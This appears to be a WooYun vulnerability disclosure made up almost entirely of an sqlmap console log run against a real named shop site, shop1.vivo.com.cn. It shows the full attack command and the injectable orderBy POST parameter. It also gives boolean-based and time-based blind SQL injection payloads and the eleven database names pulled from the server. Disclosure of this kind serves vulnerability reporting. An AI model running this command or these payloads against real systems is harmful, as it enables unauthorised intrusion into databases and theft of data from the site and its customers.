WooYun.org

PS C:\sqlmap-master> python sqlmap.py -u "http://shop1.vivo.com.cn/gallery-ajax_get_goods.html" --data="cat_id=22&orderB
y=1&showtype=list&&virtual_cat_id=" -porderBy --risk 3 --random-agent --dbs --thread 5
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151020}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 13:46:16
[13:46:16] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap-master\txt\user-agents.txt': 'Mozilla/5.0 (
Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0'
[13:46:16] [INFO] resuming back-end DBMS 'mysql'
[13:46:16] [INFO] testing connection to the target URL
[13:46:17] [INFO] heuristics detected web page charset 'ISO-8859-2'
[13:46:17] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: orderBy (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: cat_id=22&orderBy=(SELECT (CASE WHEN (8230=8230) THEN 8230 ELSE 8230*(SELECT 8230 FROM INFORMATION_SCHEMA.C
HARACTER_SETS) END))&showtype=list&&virtual_cat_id=
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cat_id=22&orderBy=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NPOW)&showtype=list&&virtual_cat_id=
---
[13:46:19] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL 5.0
[13:46:19] [INFO] fetching database names
[13:46:19] [INFO] fetching number of databases
[13:46:19] [INFO] retrieved: 11
[13:46:21] [INFO] retrieving the length of query output
[13:46:21] [INFO] retrieved: 18
[13:46:59] [INFO] retrieved: information_schema
[13:46:59] [INFO] retrieving the length of query output
[13:46:59] [INFO] retrieved: 5
[13:47:09] [INFO] retrieved: cacti
[13:47:09] [INFO] retrieving the length of query output
[13:47:09] [INFO] retrieved: 7
[13:47:25] [INFO] retrieved: ecstore
[13:47:25] [INFO] retrieving the length of query output
[13:47:25] [INFO] retrieved: 5
[13:47:37] [INFO] retrieved: mysql
[13:47:37] [INFO] retrieving the length of query output
[13:47:37] [INFO] retrieved: 18
[13:48:19] [INFO] retrieved: performance_schema
[13:48:19] [INFO] retrieving the length of query output
[13:48:19] [INFO] retrieved: 7
[13:48:41] [INFO] retrieved: seckill
[13:48:41] [INFO] retrieving the length of query output
[13:48:41] [INFO] retrieved: 4
[13:48:51] [INFO] retrieved: test
[13:48:51] [INFO] retrieving the length of query output
[13:48:51] [INFO] retrieved: 14
[13:49:30] [INFO] retrieved: test_php568cms
[13:49:30] [INFO] retrieving the length of query output
[13:49:30] [INFO] retrieved: 8
[13:49:52] [INFO] retrieved: vivo_chk
[13:49:52] [INFO] retrieving the length of query output
[13:49:52] [INFO] retrieved: 10
[13:50:26] [INFO] retrieved: vivo_store
[13:50:26] [INFO] retrieving the length of query output
[13:50:26] [INFO] retrieved: 6
[13:50:40] [INFO] retrieved: zabbix
available databases [11]:
[*] cacti
[*] ecstore
[*] information_schema
[*] mysql
[*] performance_schema
[*] seckill
[*] test
[*] test_php568cms
[*] vivo_chk
[*] vivo_store
[*] zabbix
[13:50:40] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\shop1.vivo.com.cn'